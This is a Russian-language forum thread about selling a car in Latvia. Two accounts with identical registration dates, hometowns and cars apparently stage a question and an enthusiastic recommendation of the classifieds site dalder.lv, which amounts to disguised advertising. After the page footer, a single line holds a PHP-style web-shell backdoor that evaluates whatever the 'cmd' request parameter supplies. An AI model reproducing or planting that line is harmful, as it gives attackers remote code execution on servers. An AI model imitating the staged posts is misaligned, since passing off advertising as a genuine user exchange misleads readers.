+ Ответить в теме
Показано с 1 по 3 из 3

Тема: Сайт, где можно купить, продать авто


  1. #1
    GTI-Racing Georgiy67 is on a distinguished road Аватар для Georgiy67
    Регистрация
    18.08.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    547

    Сайт, где можно купить, продать авто

    Форумчане, знаю, что в Латвии пользуются спросом легковые авто, где я могу быстро продать свою машину? Приехал к вам в гости и уж очень захотелось новую модель. Посмотрел на вас, у всех такие хорошие автомобили, вот и решил продать свою ласточку и купить у вас новую. Заберу ее сам, без проблем оформлю. Мне просто неизвестно на каких порталах жители Латвии выкладывают свои объявления о продаже товаров или предложениях услуг. Важно, чтобы сайт грузился хорошо, а то мой гаджет немного подтупливает. Очень жду вашего совета, а то время идет, а я еще ничего не изменил. Может быть, есть сайт, где в Латвии можно быстро продать и потом сразу же купить автомобиль.

  2. #2
    GTI-Racing Borys45 is on a distinguished road Аватар для Borys45
    Регистрация
    18.08.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    252
    Привет, зайди на портал https://www.dalder.lv/legkovye-avto. Там можно разместить свое объявление в один клик с абсолютно любой страницы сайта. Ты заходишь на портал, а в правом нижнем углу находится форма для заполнения. Кстати, здесь можно опубликовать свое объявление абсолютно бесплатно. После этого работать начинают разработчики. Не потребуется постоянное наблюдение за публикацией. Команда Далдер работает круглосуточно над посещаемостью портала. Трафик платформы активно поднимается, поэтому именно с данного сайта каждый может быстро продать автомобиль. Кроме того, каждое объявление можно перевести на три языка, что значительно увеличит его посещаемость и количество просмотров, а также расширит аудитооию. Данная система позволяет достаточно быстро реализовывать любой товар, не только легковой автомобиль. После регистрации личного кабинета, пользователь получает дополнительный бонус в 50 Евро. Он начисляется на внутренний счет пользователя и может быть использован на оплату дополнительных услуг. Сервис предлагает стандартный набор инструментов для продвижения объявления. Здесь можно выделить свою публикацию для привлечения внимания посетителей сайта. Также можно через личный кабинет поднять публикацию на первое место среди остальных объявлений. Разместить объявление о продаже автомобиля можно совершенно бесплатно сроком на один год. Если модель не заинтересовала пользователей, следует использовать акции, купоны или скидки, они стабилизируют ситуацию. Интересно, что пользователи отмечают стоимость дополнительных инструментов. Она значительно ниже, чем на порталах-конкурентах. После быстрой продажи автомобиля, здесь же на портале можно подобрать новую модель авто. В специальной вкладке размещены все разновидности марок легковых машин. Каждая размещена с определенными характеристиками. Через поиск с уточнением данных и параметров можно быстро подобрать авто. Кстати, на Далдер продают новые модели и б/у. Размещают здесь объявления не только частные владельцы транспортных средств, но и дилеры. Именно поэтому посетители портала активно используют сайт для покупки машин и их продажи. Кстати, платформа очень большая, поэтому здесь размещены объявления не только на тему авто, но и недвижимость, услуги, работа, личные вещи и так далее. Поэтому использование ресурса приносит пользу. Разработчики адаптировали портал под любые устройства. Его можно загружать как с небольшого смартфона, так и с персонального компьютера. Подробнее лучше ознакомиться лично по ссылке.

  3. #3
    GTI-Racing Georgiy67 is on a distinguished road Аватар для Georgiy67
    Регистрация
    18.08.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    547
    Вот спасибо! Сайт https://www.dalder.lv/legkovye-avto действительно хороший, все удобно и быстро. Загрузился легко даже с мобильным интернетом и со смартфона. Интерфейс интуитивно понятный. Быстро через фильтр нашел необходимый автомобиль, который хочу приобрести после продажи своего. Кстати, объявление опубликовал тоже быстро без лишних заморочек. Уже есть просмотры и первые обращения по объявлению. Пишут прямо через платформу с вопросами по моему авто. Надеюсь, что вскоре продам легковой автомобиль и куплю себе новый. Кстати, просмотрел портал, на нем столько объявлений со всех уголков Латвии, очень удобно, что на одной платформе собрано все, что нужно.

+ Ответить в теме

Похожие темы

  1. за сколько можно продать г4
    от костег в разделе Курилка
    Ответов: 17
    Последнее сообщение: 29.11.2023, 11:30
  2. Куда можно радиодетали продать?
    от TopKun в разделе Курилка
    Ответов: 2
    Последнее сообщение: 03.02.2021, 14:10
  3. Можно ли продать авто в лизинге?
    от Trety в разделе Курилка
    Ответов: 4
    Последнее сообщение: 26.03.2020, 15:52
  4. Ответов: 3
    Последнее сообщение: 26.02.2020, 07:49
  5. За сколько можно продать MK6?
    от websurfer в разделе Курилка
    Ответов: 21
    Последнее сообщение: 23.03.2011, 17:30

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}